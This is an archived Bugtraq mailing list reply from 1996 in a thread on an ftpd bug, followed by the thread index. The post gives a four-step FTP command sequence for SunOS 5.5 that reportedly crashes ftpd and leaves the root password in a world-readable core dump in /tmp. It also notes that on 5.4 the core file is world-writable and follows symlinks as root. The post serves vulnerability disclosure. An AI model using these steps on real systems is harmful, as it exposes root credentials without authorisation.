Bugtraq mailing list archives

Re: ftpd bug? Was: bin/1805: Bug in ftpd

From: gkaufman () cs uct ac za (Grant Kaufmann)
Date: Wed, 16 Oct 1996 11:30:01 +0200

Killing from the command line doesn't seem to work, but:
SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

Nope, its even better than that. Under 5.4, the core file
is rw-rw-rw and it follows symlinks as root.

--
Grant
--
http://www.cs.uct.ac.za/~gkaufman/pgp.html

Current thread:

Re: ftpd bug? Was: bin/1805: Bug in ftpd, (continued)
- - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
  - solaris 2.4 license-manager bug Grant Kaufmann (Oct 16)
    - Re: BoS: solaris 2.4 license-manager bug Paul Wickman (Oct 17)
    - fix for symlinks in /tmp Andrew Tridgell (Oct 18)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd gamble () dxcoms cern ch (Oct 16)
  - Re: ftpd bug? Was: bin/1805: Bug in ftpd Andrew Dills (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Jonny Llama (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Perry E. Metzger (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Rune Braathen (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Grant Kaufmann (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd James Poland 6-5251 (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Martin Rex (Oct 17)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Brad.Powell (Oct 17)